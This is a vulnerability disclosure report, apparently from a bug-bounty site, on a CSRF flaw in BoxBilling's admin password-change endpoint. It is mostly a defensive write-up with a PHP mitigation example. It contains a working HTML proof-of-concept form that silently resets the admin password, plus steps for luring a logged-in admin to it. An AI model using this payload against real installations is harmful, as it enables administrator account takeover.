Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling

Valid

Reported on Jul 5th 2021


✍️ Description

The admin password-change endpoint (/box/api/admin/profile/change_password) accepts a cross-site POST. No anti-CSRF token or other CSRF protection is implemented, and the request does not have to carry the admin's current password.

🕵️‍♂️ Proof of Concept

Create an HTML file (for example poc.html) with the following content. Replace localhost with the target's hostname or IP address.

<!-- poc.html: a cross-site form that POSTs to the admin password-change endpoint.
     The victim's browser attaches the admin session cookie to the request; the
     endpoint requires no token and no current password, so the change goes through. -->
<html><head>
<title>CSRF PoC</title>
</head><body>
<form action="http://localhost/box/api/admin/profile/change_password" method="POST">
<input type="hidden" name="password" value="changeme1" />
<input type="hidden" name="password_confirm" value="changeme1" />
<input type='submit' value='Click here' />
</form>
</body></html>

Send this file (or a link to it) to an administrator who is logged in to BoxBilling. When the admin opens the page and clicks the button, the admin password is changed to changeme1. The screenshot referenced in the original report shows the resulting request as captured in Burp.

💥 Impact

An attacker who lures a logged-in administrator to a page containing this form can set the administrator's password to a value of the attacker's choosing (changeme1 in the PoC): the endpoint performs no CSRF check and does not require the current password, so the change is applied immediately. The attacker then logs in with the new password and has full administrative access to the installation. Two conditions apply: the admin must be authenticated in the same browser, and the session cookie must be sent on a cross-site POST (a cookie set with SameSite=Lax or Strict would not be attached to this form submission). The form posts application/x-www-form-urlencoded, so no CORS preflight stands in the way.

💥 Mitigation

Require the current password (old_password) on the change_password endpoint and verify it before accepting a new one.

Implement anti-CSRF protection: issue a per-session token, embed it in every state-changing admin form, and reject requests whose token does not match the one stored server-side. Setting the session cookie with SameSite=Lax or Strict adds defense in depth but is not a substitute for the token.
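The following PHP is an added example, not BoxBilling's own code, showing both mitigations on a handler shaped like the vulnerable endpoint: a synchronizer CSRF token compared with hash_equals, and a current-password check with password_verify. The session, the stored admin record and the sample credentials are constructed arrays so the file runs stand-alone with `php`; the function names are assumptions for illustration.

```php
<?php
// Added example (not BoxBilling's code): a change_password handler hardened with
// a synchronizer CSRF token and a current-password check. Session and user
// storage are simulated with plain arrays so the script runs stand-alone.
declare(strict_types=1);

// Issue a per-session token once; render it as a hidden field in every
// state-changing admin form.
function csrf_token(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison so the check does not leak token bytes via timing.
function csrf_valid(array $session, ?string $submitted): bool
{
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// Hardened equivalent of POST /api/admin/profile/change_password.
// Returns [http_status, message]; $admin holds the stored password hash.
function change_password(array &$session, array &$admin, array $post): array
{
    // 1. Reject any request that does not carry the session's token. A form on
    //    an attacker's site cannot read the token, so forged POSTs stop here.
    if (!csrf_valid($session, $post['csrf_token'] ?? null)) {
        return [403, 'invalid CSRF token'];
    }
    // 2. Require the current password: even a request that somehow passed the
    //    token check still needs a secret the attacker does not have.
    if (!password_verify((string)($post['old_password'] ?? ''), $admin['password_hash'])) {
        return [403, 'current password is incorrect'];
    }
    // 3. Ordinary input validation on the new password pair.
    $new = (string)($post['password'] ?? '');
    if ($new === '' || $new !== (string)($post['password_confirm'] ?? '')) {
        return [400, 'passwords do not match'];
    }
    $admin['password_hash'] = password_hash($new, PASSWORD_DEFAULT);
    // Rotate the token after a sensitive change.
    unset($session['csrf_token']);
    return [200, 'password changed'];
}

// Stand-alone demonstration with constructed data.
$session = [];
$admin = ['password_hash' => password_hash('OldAdminPass!', PASSWORD_DEFAULT)];

// The forged request from poc.html: no token, no old_password -> rejected.
[$code, $msg] = change_password($session, $admin, [
    'password' => 'changeme1', 'password_confirm' => 'changeme1',
]);
printf("forged request:     %d %s\n", $code, $msg);

// A request with the token but the wrong current password -> rejected.
$token = csrf_token($session);
[$code, $msg] = change_password($session, $admin, [
    'csrf_token' => $token, 'old_password' => 'guess',
    'password' => 'changeme1', 'password_confirm' => 'changeme1',
]);
printf("wrong old password: %d %s\n", $code, $msg);

// A legitimate request from the rendered form -> accepted.
[$code, $msg] = change_password($session, $admin, [
    'csrf_token' => $token, 'old_password' => 'OldAdminPass!',
    'password' => 'changeme1', 'password_confirm' => 'changeme1',
]);
printf("legitimate request: %d %s\n", $code, $msg);
var_dump(password_verify('changeme1', $admin['password_hash']));
```

In a real deployment the token comes from $_SESSION and is written into the form as `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token($_SESSION)) ?>">`; the check has to run on every state-changing admin request, not only on change_password, and the token must stay in server-side session state so a cross-site page can never read it.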

💥 References

https://owasp.org/www-community/attacks/csrf

https://portswigger.net/web-security/csrf

Occurrences

We have contacted a member of the boxbilling team and are waiting to hear back (a year ago)
Timothy Webb Sr validated this vulnerability (a year ago)
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Timothy Webb Sr marked this as fixed with commit 42cde7 (a year ago)
Belle Aerni has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome (Admin), a year ago:

Just for reference, I added @bennottelling as the fixer to this report, and this has been confirmed by the maintainers.
